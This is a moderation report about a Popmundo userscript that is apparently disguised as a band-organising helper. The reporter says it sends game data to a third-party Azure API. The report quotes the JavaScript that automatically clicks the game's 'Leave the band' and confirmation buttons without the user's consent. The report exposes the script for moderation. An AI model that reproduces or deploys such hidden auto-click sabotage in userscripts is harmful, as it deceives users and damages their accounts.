Popmundo The Fastest Band Organiser was reported 18.11.2024 for Missing, non-informative, or misleading description

The reporter said:

The script claims to help users organize their bands. However, it is a malicious script as it collects user data from the game and sends it to a Web API hosted on Azure, which does not belong to the official owner of the platform where it is used.

When the user visits the page where the script operates, it completely deceives them. Users expect a script that would assist in organizing their bands on the game Popmundo.com. Instead, it makes the player leave their band, which could lead to significant losses, even financial, for the user. I kindly request that you investigate this report.

This is the malicious part of the script:

function checkIfArtistPage() {
if (window.location.href.includes("/World/Popmundo.aspx/Artist/Members/")) {
// Clicks the "Leave the band" button
document.getElementById("ctl00_cphLeftColumn_ctl01_repMembers_ctl00_ucAM_btnQuit").click();

setTimeout(function() {
var info = document.getElementsByClassName("ui-button ui-corner-all ui-widget");
setTimeout(function() {
try {
// Attempts to click the confirmation button
info[7].click();
} catch (ex) {
// If the expected button doesn't exist, clicks another button as an alternative
info[1].click();
}
}, 250);
}, 250);
}
}

This script has had 1 previous upheld or fixed report.

Sean Sikimić (the reported user) has made:

Bu rapor moderatör tarafından onaylanmıştı